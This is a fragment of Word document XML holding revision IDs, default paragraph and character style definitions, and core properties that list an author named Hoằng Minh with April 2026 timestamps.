    <w:rsid w:val="003A17A1"/>
    <w:rsid w:val="003A1A9F"/>
    <w:rsid w:val="004D2700"/>
    <w:rsid w:val="0074103A"/>
    <w:rsid w:val="00986294"/>
    <w:rsid w:val="009B6518"/>
    <w:rsid w:val="00A13C43"/>
    <w:rsid w:val="00A929EA"/>
    <w:rsid w:val="00D01282"/>
    <w:rsid w:val="00EF6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E989"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5C33009C-43BE-4741-A152-07EB7CFC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A9F"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="003A1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A9F"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="003A1A9F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="003A1A9F"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="003A1A9F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="003A1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A9F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="003A1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Minh</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Hoằng Minh</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-17T17:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-18T02:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>